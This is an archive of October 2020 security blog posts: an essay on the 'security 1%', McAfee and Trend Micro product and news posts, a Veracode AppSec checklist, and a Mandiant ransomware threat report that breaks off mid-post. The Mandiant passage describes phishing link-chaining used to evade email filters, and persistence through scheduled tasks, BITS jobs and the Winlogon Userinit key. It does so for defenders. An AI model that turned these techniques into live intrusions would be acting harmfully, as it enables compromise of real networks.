Monthly Archives: October 2020

Security and the One Percent: A Thought Exercise in Estimation and Consequences

There's a good chance that if you're reading this post, you're a member of an exclusive club. I call it the security one percent, or the security 1%. This is shorthand for the assortment of people and organizations who have the personnel, processes, technology, and support to implement somewhat robust digital security programs, especially those with detection and response capabilities and not just planning and resistance/"prevention" functions.

Introduction 


This post will estimate the size of the security 1% in the United States. It will then briefly explain how the security strategies of the 1% might be irrelevant at best or damaging at worst to the 99%.

A First Cut with FIRST


It's difficult to measure the size of the security 1%, but not impossible. My goal is to ascertain the correct orders of magnitude. 

One method is to review entities who are members of the Forum of Incident Response and Security Teams, or FIRST. FIRST is an organization to which high-performing computer incident response teams (CIRTs) may apply once their processes and data handling meet standards set by FIRST. 

I learned of FIRST when the AFCERT was a member in the late 1990s. I also assisted with FIRST duties when Foundstone was a member in the early 2000s. I helped or sponsored membership when I worked at General Electric in the 2000s and Mandiant in the 2010s. I encourage all capable security teams to join FIRST.

Being a FIRST member means having a certain degree of incident response and data handling capability, and it signals to the world and to other FIRST teams that the member entity is serious about incident detection and response.

As of the writing of this post, there are 540 FIRST teams worldwide. Slightly more than 100 of them are based in the United States. 

To put that in perspective, there are fewer than 4,000 publicly traded companies in the US. That means that even if every single US FIRST member represented a publicly traded company -- and that is not the case -- FIRST representation for US publicly traded companies is only 2.5%.

Beyond FIRST


Some of you might claim FIRST membership is no big deal. My current employer, Corelight, isn't a member, you might say. 

Perhaps you could argue that for every US FIRST member, there are 9 others which have equivalent or better security teams. That would increase the cadre of entities with respectable detection and response capabilities from 100 to 1,000. That would still mean an estimate that says 75% of publicly traded US companies have sub-par or non-existent security programs.

Remember that we've only been talking about a population of 4,000 publicly traded US companies. The US Small Business and Entrepreneurship Council estimates that there were 5.6 million employer firms in the United States in 2016. Let's sadly reduce that to 4 million to account for the devastation of Covid. 

(This reduction actually makes the situation look better for security, as terrible as it is either way. In other words, if I used a denominator of 5.6 million and not 4 million, security estimates would be 40% worse.)


Small Business and Entrepreneurship Council


Let's be really generous and assume that only 1 in 100 of those 4 million businesses have any sensitive data. (That's again very generous.) 

That leaves us with 400,000 entities with data worth defending. (Again, all of these estimates make it look like we're doing better than we actually are. The reality is probably a lot worse.)

Remember that we only had 100 US teams in FIRST, and we assumed an incredible 10-to-1 ratio to add another 900 non-FIRST organizations to the list of entities with decent security.

Now let's be generous again and assume a 4-to-1 ratio, such that for every 1 team in the publicly traded world there are 3 in the private world that also have decent security.

This creates a total of 4,000 US organizations with decent security, out of 400,000 that need it. Those 4,000 are the security 1%.

If you think of the "best of the best," there's probably only about 40 US security teams that qualify as global leaders and innovators. These are the teams that can stand toe-to-toe with most foes, and still struggle due to the nature of the security challenge. You and I could probably name them: Lockheed Martin, Google, General Electric, etc.

That group of 40 is the 1% of the 1%, being 40 of the 4,000 of the 400,000. These 40 are the US .01%.

If you think I'm being too conservative with only 40 teams, then feel free to increase it to 400. I'd be really curious to see someone compile a list of 400 world-beating security teams. That would still mean that US group of 400 is the .1%.

Sanity Check: A Few Statistics


To give you a sense of my numbers, and whether they are of the right order of magnitude at least, here are a few statistics:

1. The 2020 Accenture Security Third Annual State of Cyber Resilience Report featured responses from 4,644 "executives." This is the same order of magnitude as my estimates here, diluted due to a global perspective. (In other words, there are actually fewer US executives responding to this survey due to the global respondent pool.)


2020 Accenture Security Third Annual State of Cyber Resilience Report, p 46


2. The 2021 PWC Global Digital Trust Insights Report featured responses from "3,249 business and technology executives around the world." This is again the same order of magnitude, again diluted due to global responses.

2021 PWC Global Digital Trust Insights Report, Web summary


3. A 2019 report by Bitglass found that 38% of the Fortune 500 do not have a CISO. That's 190 publicly traded companies! Hopefully it's less in 2020. Let's be crazy and assume the CISO count is 400 out of 500?

2019 Bitglass Report


4. The Verizon DBIR featured reporting from 81 entities, the highest number in the history of the report. I do not know how many are in the US, but it's obviously less than 100, so the order of magnitude is again preserved. In other words, of the 4,000 capable security organizations in the US, less than 2.5% of them contributed to the DBIR. That would be less than 100, or the number of US FIRST teams.


2020 Verizon DBIR Report


Remember that my focus here is the United States. This means the numbers from PWC, Accenture, and Verizon need to be reduced because they represent global audiences. However, the original FIRST count of roughly 100 American entities, and the statistic about the Fortune 500, which is just American companies, are already appropriately sized.

Security and the One Percent


What do these numbers mean for security? 

Speaking first just for the US, it means that most of the conversations among security practitioners on Twitter, in mailing lists, during Webinars, within classes, and other gatherings of people take place within a very small grouping. These are the 1% that are part of the roughly 4,000 entities in the US that have a decent security capability. 

If those are the 1%, it means that the 99% are not included in these discussions.

This means that free threat intelligence, or free classes, or free post-exploitation security tools, or other free capabilities mean nothing, or almost nothing to those 99% of organizations that do not have security capabilities, or whose capabilities are so low or stretched that they cannot take advantage of whatever the 1% offers.

An Analogy: Personal Finance


I almost became a certified financial planner. Had I not secured a job in the AFCERT, I planned to separate from the Air Force, earn my CFP designation, and advise people on how to manage their assets and prepare for retirement. 

I've come to realize that discussions I witness in the "security community" are like the discussions I see in the finance community. It requires taking a big step back to appreciate this situation.

People at the 1% level in finance want to know how to manage their stock options, or how to save money for their child's college tuition through a specialized savings vehicle, or, at the highest ends, how to move assets throughout "Moneyland" in pursuit of ever lower taxes.

These concerns are light-years away from the person who has a few dollars saved in an employer-provided 401(k) program, or who has little to no savings whatsoever.  


The Consequences of the Security One Percent


So what's the big deal?

The consequence of the existence and mindshare dominance of the security 1% is that the strategies and tactics they employ may work for the 1%, but not the 99%. 

I'm not talking about the "rich" preying on the "poor." That's neither my message nor my philosophical outlook. 

Rather, I mean that methods that the security 1% use to defend themselves are irrelevant at best to the 99%, and damaging at worst to the 99%.

An example of irrelevance would be providing free indicators of compromise (IOCs) or other forms of threat intelligence. It's well-meaning but ultimately of no help to the 99%. If an entity in the 99% has a rudimentary security capability, or essentially zero security capability, threat intelligence is irrelevant.

An example of damage would be publication of post-exploitation security tools, or PESTs. The 1% may have the ability to use such tools to equip their red or penetration testing teams, determining if the countermeasures implemented by their blue team can resist or detect and respond to their simulated and later actual attacks. The 99%, however, have little to no ability to leverage PESTs. They end up simply being victims when actual intruders use PESTs to pillage the 99%'s assets.

Conclusion


Readers can argue with my numbers. These are estimates, yes, but I believe I've gotten the orders of magnitude right, at least in the US. It's probably worse overseas, especially in the developing world. 

The point of this exercise is to propose the idea that the benefits of certain activities that may accrue to the 1% may be, and likely are, irrelevant and/or damaging to the 99%.

In brief:

I challenge the security 1% to first recognize their elite status, and second, to think how their beliefs and actions affect the 99% -- especially for the worse.

As this is a wicked problem, there is no easy answer. That may be worth a future blog post.

McAfee Named a Leader in the 2020 Gartner Magic Quadrant for CASB

McAfee MVISION Cloud was the first to market with a CASB solution to address the need to secure corporate data in the cloud. Since then, Gartner has published several reports dedicated to the CASB market, which is a testament to the critical role CASBs play in enabling enterprise cloud adoption. Today, Gartner named McAfee a Leader in the 2020 annual Gartner Magic Quadrant for Cloud Access Security Brokers (CASB) for the fourth time evaluating CASB vendors.

Cloud access security brokers have become an essential element of any cloud security strategy, helping organizations govern the use of cloud and protect sensitive data in the cloud. Security and risk management leaders concerned about their organizations’ cloud use should investigate CASBs.

In its fourth Magic Quadrant for Cloud Access Security Brokers, Gartner evaluated eight vendors that met its inclusion criteria. MVISION Cloud, as part of the MVISION family of products at McAfee, is recognized as a Leader in the report for the fourth year in a row. To learn more about how Gartner assessed the market and MVISION Cloud, download your copy of the report here.

This year, Gartner commissioned a highly rigorous process to compile its Gartner Magic Quadrant for Cloud Access Security Brokers (CASB) report and they relied on numerous inputs to compile the report, including these materials from vendors to understand their product offerings:

  • Questionnaire – A 300+ point questionnaire resulting in hundreds of pages of responses
  • Financials – Detailed company financial data covering CASB revenue
  • Documentation – Access to all product documentation
  • Customer Peer Reviews – Gartner encourages customers to submit anonymized reviews via their Peer Insights program. You can read them here.
  • Demo – Covering over 50 Gartner-defined use cases to validate product capabilities

In 2020, McAfee made several updates and additions to its solutions, strengthening its position as an industry expert, including:

 

McAfee also received recognition as the only vendor to be named the January 2020 Gartner Peer Insights Customers’ Choice for Cloud Access Security Brokers based on customer feedback and ratings for McAfee MVISION Cloud.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

The Gartner Peer Insights Logo is a trademark and service mark of Gartner, Inc., and/or its affiliates, and is used herein with permission. All rights reserved

Gartner Peer Insights ‘Voice of the Customer’: Cloud Access Security Brokers, Peer Contributors, 13 March 2020. Gartner Peer Insights reviews constitute the subjective opinions of individual end users based on their own experiences and do not represent the views of Gartner or its affiliates. Gartner Peer Insights Customers’ Choice constitute the subjective opinions of individual end-user reviews, ratings, and data applied against a documented methodology; they neither represent the views of, nor constitute an endorsement by, Gartner or its affiliates.

The post McAfee Named a Leader in the 2020 Gartner Magic Quadrant for CASB appeared first on McAfee Blogs.

This Week in Security News: Trend Micro Researchers Uncover Two Espionage Backdoors Associated with Operation Earth Kitsune and Trickbot and Ransomware Attackers Plan Big Hit on U.S. Hospitals

Welcome to our weekly roundup, where we share what you need to know about cybersecurity news and events that happened over the past few days. This week, learn about how Trend Micro researchers uncovered two new espionage backdoors associated with the ‘Operation Earth Kitsune’ campaign. Also, read about how U.S. healthcare providers have been put on high alert over Trickbot malware and ransomware targeting the sector.

Read on:

Operation Earth Kitsune: A Dance of Two New Backdoors

Trend Micro recently published a research paper on Operation Earth Kitsune, a watering hole campaign aiming to steal information by compromising websites. Besides its heavy use of SLUB malware, Trend Micro researchers also uncovered two new espionage backdoors associated with the campaign: agfSpy and dneSpy, dubbed as such following the attackers’ three-letter naming scheme.

FBI Warning: Trickbot and Ransomware Attackers Plan Big Hit on U.S. Hospitals

U.S. healthcare providers, already under pressure from the COVID-19 pandemic, are on high alert over Trickbot malware and ransomware targeting the sector. Trickbot is one of the largest botnets in the world, against which Microsoft took U.S. legal action earlier this month in an effort to gain control of its servers. Within a day of the seizure, Trickbot C&C servers and domains were replaced with new infrastructure.

Trend Micro HouseCall for Home Networks

While a home network provides numerous benefits, it can also expose its users to safety and privacy risks. Checking for those risks doesn’t need to be costly: Trend Micro’s HouseCall for Home Networks (HCHN) solution, which is available for free, scans the connected devices in home networks and detects those that pose security risks.

Bug-Bounty Awards Spike 26% in 2020

According to a list of top 10 vulnerabilities by HackerOne, cross-site scripting (XSS) remained the most impactful vulnerability and reaped the highest rewards for ethical hackers in 2020 for the second year in a row, earning hackers $4.2 million in total bug-bounty awards in the last year, a 26-percent increase from what was paid out in 2019 for finding XSS flaws. Following XSS on the list: Improper access control, information disclosure, server-side request forgery (SSRF) and more.

Supply Chain Attacks in the Age of Cloud Computing: Risks, Mitigations, and the Importance of Securing Back Ends

Security is an aspect that every enterprise needs to consider as they use and migrate to cloud-based technologies. On top of the list of resources that enterprises need to secure are networks, endpoints, and applications. However, another critical asset that enterprises should give careful security consideration to is their back-end infrastructure which, if compromised, could lead to supply chain attacks.

U.S. Shares Information on North Korean Threat Actor ‘Kimsuky’

An alert released this week by the Cybersecurity and Infrastructure Security Agency (CISA), the FBI, and the Cyber Command Cyber National Mission Force (CNMF) provides information on Kimsuky, a threat actor focused on gathering intelligence on “foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions” on behalf of the North Korean government. The advisory says the adversary has been active since 2012, engaging in social engineering, spear-phishing, and watering hole attacks.

76% of Applications Have at Least One Security Flaw

Most applications contain at least one security flaw and fixing those flaws typically takes months, a new Veracode report reveals. This year’s analysis of 130,000 applications found that it takes about six months for teams to close half the security flaws they find. The report also uncovered some best practices to significantly improve these fix rates.

Apps Infected with Adware Found on Google Play Store

Some 21 malicious Android apps containing intrusive adware were discovered on the Google Play Store, but most have now been removed, according to a report from Avast. These fraudulent mobile applications, disguised as Android gaming apps, had been downloaded more than 8 million times since they were made available in the store.

Patients in Finland Blackmailed After Therapy Records Were Stolen by Hackers

The confidential records of thousands of psychotherapy patients in Finland have been hacked and some are now facing the threat of blackmail. Attackers were able to steal records related to therapy sessions, as well as patients’ personal information including social security numbers and addresses, according to Vastaamo, the country’s largest private psychotherapy center.

Surprised by the Vastaamo hack and subsequent blackmail of patients?  Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.


Catch the Most Sophisticated Attacks Without Slowing Down Your Users

Most businesses cannot survive without being connected to the internet or the cloud. Websites and cloud services enable employees to communicate, collaborate, research, organize, archive, create, and be productive.

Yet, the digital connection is also a threat. External attacks on cloud accounts increased by an astounding 630% in 2019. Ransomware and phishing remain major headaches for IT security teams, and as users and resources have migrated outside of the traditional network security perimeter, it’s become increasingly difficult to protect users from clicking on a link or opening a malicious file.

This challenge has increased the tension between two IT mandates—allowing unfettered access to necessary services, while preventing attacks and blocking access to malicious sites. Automation helps significantly, with modern security pipelines blocking about 99.5% of malicious and suspicious activity by filtering known bad files and sites, as well as using sophisticated anti-malware scanning and behavioral analytics.

Security is a lot of work

However, the remaining half of 1% still represents a significant number of sites and potential threats that require time for a team of security analysts to triage. Therefore, IT managers are faced with the challenge of devising balanced security policies. Many companies default to blocking unknown traffic, but over-blocking of web sites and content can hinder user productivity while creating a surge in help-desk tickets as users attempt to go to legitimate sites that have not yet been classified. On the flipside, web policies that allow access too freely greatly increase the likelihood of serious, business-threatening security incidents.

With a focus on digital transformation, accelerated by the change in work habits and locations during the pandemic, companies need flexible, transparent security controls that enable safe user access to critical web and cloud resources without overwhelming security teams with constant help desk calls, policy changes, and manual triaging. Remote Browser Isolation – if implemented properly – can help achieve this.

While security solutions leveraging URL categorization, domain reputation, antivirus, and sandboxes can stop 99.5% of threats, remote browser isolation (RBI) can handle the remaining unknown events, rather than the common strategy of choosing to rigidly block or allow everything. RBI allows web content to be delivered and viewed in a safe environment, while analysis is conducted in the background. Using RBI, any request to an unknown site or URL that remains suspicious after traversing the web protection defense-in-depth pipeline will be rendered remotely, preventing any impact to a user’s system in the event the content is malicious.

Relying on RBI

Remote browser isolation blocks malicious code from running on an employee’s system just because they clicked a link. The technology will also prevent pages from using unprotected cookies to try and gain access to protected web services and sites. Such protections are particularly important in the age of ransomware, when an inadvertent click on a malicious link can lead to significant damage to a company’s digital assets.

Given the benefits of remote browser isolation, some companies have deployed the technology to render every site. While this can very effectively mitigate security risk, isolating all web and cloud traffic demands considerable computing resources and is prohibitively expensive from a license cost point of view.

By integrating remote browser isolation (RBI) technology directly into our MVISION Unified Cloud Edge (UCE) solution, McAfee integrates RBI with the existing triage pipeline. This means that the rest of the threat protection stack – including global threat intelligence, anti-malware, reputation analysis, and emulation sandboxing – can filter out the majority of threats while only one out of every 200 requests needs to be handled using the RBI. This dramatically reduces overhead. McAfee’s UCE makes this approach dead simple: rather than positioning remote browser isolation as a costly and complicated add-on service, it is included with every MVISION UCE license.

Full Protection for High-Risk Individuals

However, there are specific people inside a company—such as the CEO or the finance department—with whom you cannot take chances. For those privileged users, full isolation from potential internet threats is also available. This approach ensures full virtual segmentation of the user’s system from the internet and shields it against any potential danger, enabling them to use the web and cloud freely and productively.

McAfee’s approach greatly reduces the risk of users being compromised by phishing campaigns or inadvertently getting infected by ransomware – such attacks can incur substantial costs and impact an organization’s ability to operate. At the same time, organizations benefit from a workforce that is freely able to access the web and cloud resources they need to be productive, while IT staff are freed from the burden of rigid web policies and constantly addressing help-desk tickets.

Want to know more? Check out our RBI demonstration.

The post Catch the Most Sophisticated Attacks Without Slowing Down Your Users appeared first on McAfee Blogs.

With No Power Comes More Responsibility

You’ve more than likely heard the phrase “with great power comes great responsibility.” Alternatively called the “Peter Parker Principle” this phrase became well known in popular culture mostly due to Spider-Man comics and movies – where Peter Parker is the protagonist. The phrase is so well known today that it actually has its own article in Wikipedia. The gist of the phrase is that if you’ve been empowered to make a change for the better, you have a moral obligation to do so.

However, what I’ve noticed as I talk to customers about cloud security, especially security for Infrastructure as a Service (IaaS), is a phenomenon I’m dubbing the “John McClane Principle” – the name has been changed to protect the innocent 🙂

The John McClane Principle happens when someone has been given responsibility for fixing something but at the same time has not been empowered to make necessary changes. On the surface this scenario may sound absurd, but I bet many InfoSec teams can sympathize with the problem. The conversation goes something like this:

  • CEO to InfoSec: You need to make sure we’re secure in the cloud. I don’t want to be the next [insert latest breach here].
  • InfoSec to CEO: Yeah, so I’ve looked at how we’re using the cloud and the vast majority of our problems are from a lack of processes and knowledge. We have a ton of teams that are doing their own thing in the cloud, and I don’t have complete visibility into what they’re doing.
  • CEO to InfoSec: Great, go fix it.
  • InfoSec to CEO: Well, the problem is I don’t have any say over those teams. They can do whatever they want. To fix the problem they’re going to have to change how they use the cloud. We need to get buy-in from managers, but those managers have told me they’re not interested in changing anything because it’ll slow things down.
  • CEO to InfoSec: I’m sure you’ll figure it out. Good luck, and we better not have a breach.

That’s when “with no power comes more responsibility” rings true.

And why is that? The reason is that IaaS has fundamentally changed how we consume IT and along with that how we scale security. No longer do we submit purchase requests and go through a long, lengthy process to spin up infrastructure resources. Now anyone with a credit card can spin up the equivalent of a data center within minutes across the globe.

The agility however introduced some unintended changes to InfoSec and in order to scale, cloud security cannot be the sole responsibility of one team. Rather cloud security must be embedded in process and depends on collaboration between development, architects, and operations. These teams now have a more significant role to play in cloud security, and in many cases are the only ones who can implement change in order to enhance security. InfoSec now acts as Sherpas instead of gatekeepers to make sure every team is marching to the same, secure pace.

However, as John McClane can tell you, the fact that more teams look after cloud security doesn’t necessarily mean you have a better solution. In fact, having to coordinate across multiple teams with different priorities can make security even more complex and slow you down. Hence the need for a streamlined security solution that facilitates collaboration between developers, architects, and InfoSec but at the same time provides guardrails, so nothing slips through the cracks.

With that, I’m excited to announce our new cloud security service built especially for customers moving and developing applications in the cloud. We call it MVISION Cloud Native Application Protection Platform – or just CNAPP because every service deserves an acronym.

What is CNAPP? CNAPP is a new security service we’ve just announced today that combines solutions from Cloud Security Posture Management (CSPM), Cloud Workload Protection Platform (CWPP), Data Loss Prevention (DLP), and Application Protection into a single solution. Now in beta with a target launch date of Q1, 2021, we built CNAPP to provide InfoSec teams broad visibility into their cloud native applications. For us, the goal wasn’t how do we slow things down to make sure everything is secure; rather how do we give InfoSec teams the visibility and context they need for cloud security while allowing dev teams to move fast.

Let me briefly describe what features CNAPP has and list some features that are customer favorites.

CSPM

The vast majority of breaches in IaaS today are due to service misconfigurations. Gartner famously said in 2016 that “95% of cloud security failures will be the customer’s fault.” Just last year Gartner updated that quote to say “99% of cloud security failures will be the customers’ fault.” I’m waiting for the day when Gartner says “105% will be the customer’s fault.”

Why is the percentage so high? There are multiple reasons, but we hear a lot from our customers that there is a huge lack of knowledge on how to secure new services. Each cloud provider is releasing new services and capabilities at a dizzying pace with no blockers for adoption. Unfortunately, the industry hasn’t kept pace in building a workforce that knows and understands how best to configure these new services and capabilities. CNAPP provides customers with the ability to immediately audit all cloud services and benchmark those services against best security practices and industry standards like CIS Foundations, PCI, HIPAA, and NIST.

Within that audit (we call it a security incident), CNAPP provides detailed information on how to reconfigure services to improve security, but the service also provides the ability to assign the security incident to dev teams with SLAs so there’s no ambiguity on who owns what and what needs to change. All of these workflows can be automated so multiple teams are empowered in near real-time to find and fix problems.

Additionally, CNAPP has a custom policy feature where customers can create policies for identifying risky misconfigurations unique to their environments as well as integrations with developer tools like Jenkins, Bitbucket, and GitHub that provide feedback on deployments that don’t meet security standards.

CWPP

IaaS platforms have become catalysts for Open Source Software (OSS) like Linux (OS), Docker (container), and Kubernetes (orchestration). The challenge with using these tools is the inherent risk of Common Vulnerabilities and Exposures (CVE) found in software libraries and misconfigurations in deploying new services. Another famous quote by Gartner is that “70% of attacks against containers will be from known vulnerabilities and misconfigurations that could have been remediated.” But how does the InfoSec team quickly spot those vulnerabilities and misconfigurations, especially in ephemeral environments with multiple developer teams pushing frequent releases into CI/CD pipelines?

Based on our acquisition of NanoSec last year, CNAPP provides full workload protection by identifying all compute instances, containers, and container services running in IaaS while identifying critical CVEs, misconfigurations in both repository and production container services, and introducing some new protection features. These features include application allow listing, OS hardening, and file integrity monitoring with plans to introduce nano-segmentation and on-prem support soon.

Customer Favorites

We’ve had a great time working jointly with our customers to release CNAPP. I’d like to highlight some of the use cases that have proven to be game changers for our customers.

  • In-tenant DLP scans: many of our customers have legitimate use cases for publicly exposed cloud storage services (sometimes referred to as buckets), but at the same time need to ensure those buckets don’t have sensitive data. The challenge with using DLP for these services is many solutions available in the market copy the data into the vendor’s own environment. This increases customer costs with egress charges and also introduces security challenges with data transit. CNAPP allows customers to perform in-tenant DLP scans where the data never leaves the IaaS environment, making the process more secure and less expensive.
  • MITRE ATT&CK Framework for Cloud: the language of Security Operation Centers (SOC) is MITRE, but there is a lot of nuance in how cloud security incidents fit into this framework. With CNAPP we built an end-to-end process that maps all CSPM and CWPP security incidents to MITRE. Now InfoSec and developer teams can work more effectively together by automatically categorizing every cloud incident to MITRE, facilitating faster responses and better collaboration.
  • Unified Application Security: CNAPP is built on the same platform as our MVISION Cloud service, a Gartner Magic Quadrant Leader for Cloud Access Security Broker (CASB). Customers are now able to get detailed visibility and security control over their SaaS applications along with applications they are building in IaaS with the same solution. Our customers love having one console that provides a holistic picture of application risk across all teams – SaaS for consumers and IaaS for builders.

There are a lot more features I’d love to highlight, but instead I invite you to check out the solution for yourself. Visit https://mcafee.com/CNAPP for more information on our release or request a demo at https://mcafee.com/demo. We’d love to get your feedback and hear how MVISION CNAPP can help you become more empowered and responsible in the cloud.

This post contains information on products, services and/or processes in development. All information provided here is subject to change without notice at McAfee’s sole discretion. Contact your McAfee representative to obtain the latest forecast, schedule, specifications, and roadmaps.

The post With No Power Comes More Responsibility appeared first on McAfee Blogs.

A Software Security Checklist Based on the Most Effective AppSec Programs

Veracode's Chris Wysopal and Chris Eng joined Enterprise Strategy Group (ESG) Senior Analyst Dave Gruber and award-winning security writer and host of the Smashing Security podcast, Graham Cluley, at Black Hat USA to unveil the findings from a new ESG research report, Modern Application Development Security. The research is based on a survey of nearly 400 developers and security professionals, which explored the dynamic between the roles, their trigger points, the extent to which security teams understand modern development, and the buying intentions of application security (AppSec) teams.

As the presenters went through the data, it led to a larger discussion about AppSec best practices and what steps organizations can take to mature their programs. Here are the best practices laid out during the presentation as an easy-to-follow checklist as well as supporting data from the ESG report.

Application security controls are highly integrated into the CI/CD toolchain.

In the ESG survey, 43 percent of organizations agreed that DevOps integration is most important to improving AppSec programs, but only 56 percent of respondents answered that they use a highly integrated set of security controls throughout their DevOps process. Integrating security measures into the CI/CD toolchain not only makes it easier for developers to run AppSec tests, but it also helps organizations discover security issues sooner, which speeds up time to deployment.

Application security best practices are formally documented.

In order to have a successful AppSec program, everyone needs to be on the same page regarding best practices. The CISO should help facilitate the formal documentation of AppSec best practices. Developers and security professionals can reference the list and use it to guide their decisions.

Application security training is included as part of the ongoing development security training program.

Developers have been increasingly tasked with implementing security measures, including writing secure code and remediating vulnerabilities. Most developers don't receive secure code training courses in college, so it is up to organizations to offer security training. But according to the survey, more than 20 percent of organizations only provide training when developers join the team.

Developers should have multiple, at-leisure training opportunities throughout the year, like virtual or hands-on programs, such as Veracode Security Labs. Chris Wysopal pointed out the importance of human touchpoints as part of ongoing developer training. If someone is checking in on developers to make sure they're completing their training, they'll likely take it more seriously. Consider a security champions program. The security champions are developers who have an interest in learning about security. If you have at least one security champion on every scrum team, that person can help ensure that their peers are up to speed on the latest security training and best practices.

Ongoing developer security training includes formal training programs, and a high percentage of developers participate.

At-leisure security training is a great way for developers to learn on their own time. But it is also important to implement formal security training with a set completion date and a skills assessment. Without formal security training, developers may not develop the skills they need to write secure code and remediate vulnerabilities. This could lead to slower and more expensive deployments because of rework or vulnerable code being pushed to production.

According to the survey, 35 percent of respondents answered that less than half of their development teams are participating in formal training. And only 15 percent reported that all their developers are participating. As for frequency, less than half require their developers to engage in formal training more than once per year.

Development managers are responsible for communicating best practices to developers.

Developers rely on the information they receive from their development managers. Development managers should be following the organization's documented AppSec best practices and they should be communicating the best practices to the developers.

Security issues are traced back to the individual development teams.

42 percent of organizations responded that they track security issue introduction for individual development teams. This number should be much higher because if you don't track security issues introduced by each team, the team could make the same mistake multiple times. When you track the security issues, you can target efforts to improve those teams and individuals who introduce the most issues.

You track your AppSec program using formal processes and metrics to ensure that it's continuously improving.

You should have a formal process in place to regularly measure your AppSec program using metrics. With the right metrics, you can pinpoint areas where your AppSec program is performing well and areas that could use improvement. The data can also be used to show senior management or stakeholders if their AppSec investment is getting the right return on investment (ROI).

You track individual development teams using metrics to ensure that they are continuously improving.

Just as you should be tracking if security issues are introduced by individual development teams, you should also be tracking if the development teams are making continuous improvements. If you are addressing teams or individuals when security issues are introduced, it should be expected that the teams/individuals are taking steps to ensure that the same mistake doesn't happen again. Metrics can be used to prove that the teams are actively making improvements.

You track security issues during the code development process.

If code is not tracked for security issues in the development phase and a vulnerability is identified later in the software development lifecycle (SDLC), it can be costly and time consuming to fix the flaws. You can track the code with a tool like Veracode's IDE Scan. The IDE Scan reviews code in real-time and provides remediation methods.

Automated risk aggregation tools roll-up risk to keep senior development leaders informed.

Senior development leaders should be fully aware of the risks and vulnerabilities in applications. Consider using automation risk aggregation tools to keep leaders informed in an efficient manner.


To make sure your organization is following the best practices, download the printer-ready Software Security Checklist: 10 Elements of an Effective AppSec Program.

NIST Offers ‘Quick-Start’ Guide for Its Security and Privacy Safeguards Catalog

If you’ve ever tried to set up a home entertainment system by poring over a thick manual, you might appreciate the manufacturer also providing you with a quick-start guide so you can get your party going in short order. Information security experts at the National Institute of Standards and Technology (NIST) have created what is essentially a quick-start guide to their flagship risk management tool, to help organizations reduce their security and privacy risks more easily. Their creation, whose full title is Control Baselines for Information Systems and Organizations (NIST Special Publication

Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser

Throughout 2020, ransomware activity has become increasingly prolific, relying on an ecosystem of distinct but co-enabling operations to gain access to targets of interest before conducting extortion. Mandiant Threat Intelligence has tracked several loader and backdoor campaigns that lead to the post-compromise deployment of ransomware, sometimes within 24 hours of initial compromise. Effective and fast detection of these campaigns is key to mitigating this threat.

The malware families enabling these attacks previously reported by Mandiant to intelligence subscribers include KEGTAP/BEERBOT, SINGLEMALT/STILLBOT and WINEKEY/CORKBOT. While these malware families communicate with the same command and control infrastructure (C2) and are close to functional parity, there are minimal code overlaps across them. Other security researchers have tracked these malware families under the names BazarLoader and BazarBackdoor or Team9.

The operators conducting these campaigns have actively targeted hospitals, retirement communities, and medical centers, even in the midst of a global health crisis, demonstrating a clear disregard for human life.

Email Campaign TTPs

Campaigns distributing KEGTAP, SINGLEMALT and WINEKEY have been sent to individuals at organizations across a broad range of industries and geographies using a series of shifting delivery tactics, techniques and procedures (TTPs). Despite the frequent changes seen across these campaigns, the following has remained consistent across recent activity:

  • Emails contain an in-line link to an actor-controlled Google Docs document, typically a PDF file.
  • This document contains an in-line link to a URL hosting a malware payload.
  • Emails masquerade as generic corporate communications, including follow-ups about documents and phone calls or emails crafted to appear related to complaints, terminations, bonuses, contracts, working schedules, surveys or queries about business hours.
  • Some email communications have included the recipient’s name or employer name in the subject line and/or email body.

Despite this uniformity, the associated TTPs have otherwise changed regularly—both between campaigns and across multiple spam runs seen in the same day. Notable ways that these campaigns have varied over time include:

  • Early campaigns were delivered via Sendgrid and included in-line links to Sendgrid URLs that would redirect users to attacker-created Google documents. In contrast, recent campaigns have been delivered via attacker-controlled or compromised email infrastructure and have commonly contained in-line links to attacker-created Google documents, although they have also used links associated with the Constant Contact service.
  • The documents loaded by these in-line links are crafted to appear somewhat relevant to the theme of the email campaign and contain additional links along with instructions directing users to click on them. When clicked, these links download malware binaries with file names masquerading as document files. Across earlier campaigns these malware binaries were hosted on compromised infrastructure, however, the attackers have shifted to hosting their malware on legitimate web services, including Google Drive, Basecamp, Slack, Trello, Yougile, and JetBrains.
  • In recent campaigns, the malware payloads have been hosted on numerous URLs associated with one or more of these legitimate services. In cases where the payloads have been taken down, the actors have sometimes updated their Google documents to contain new, working links.
  • Some campaigns have also incorporated customization, including emails with internal references to the recipients’ organizations (Figure 1) and organizations’ logos embedded into the Google Docs documents (Figure 2).


Figure 1: Email containing internal references to target an organization’s name


Figure 2: Google Docs PDF document containing a target organization’s logo

Hiding the final payload behind multiple links is a simple yet effective way to bypass some email filtering technologies. Various technologies have the ability to follow links in an email to try to identify malware or malicious domains; however, the number of links followed can vary. Additionally, embedding links within a PDF document further makes automated detection and link-following difficult.

Post-Compromise TTPs

Given the possibility that accesses obtained from these campaigns may be provided to various operators to monetize, the latter-stage TTPs, including ransomware family deployed, may vary across intrusions. A notable majority of cases where Mandiant has had visibility into these post-compromise TTPs have been attributable to UNC1878, a financially motivated actor that monetizes network access via the deployment of RYUK ransomware.

Establish Foothold

Once the loader and backdoor have been executed on the initial victim host, the actors have used this initial backdoor to download POWERTRICK and/or Cobalt Strike BEACON payloads to establish a foothold. Notably, the respective loader and backdoor as well as POWERTRICK have typically been installed on a small number of hosts in observed incidents, suggesting these payloads may be reserved for establishing a foothold and performing initial network and host reconnaissance. However, BEACON is frequently found on a larger number of hosts and used throughout various stages of the attack lifecycle.

Maintain Presence

Beyond the preliminary phases of each intrusion, we have seen variations in how these attackers have maintained presence after establishing an initial foothold or moving laterally within a network. In addition to the use of common post-exploitation frameworks such as Cobalt Strike, Metasploit and EMPIRE, we have observed the use of other backdoors, including ANCHOR, that we also believe to be under control of the actors behind TrickBot.

  • The loaders associated with this activity can maintain persistence through reboot by using at least four different techniques, including creating a scheduled task, adding itself to the startup folder as a shortcut, creating a scheduled Microsoft BITS job using /setnotifycmdline, and adding itself to the Userinit value under the following registry key:
    • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon.
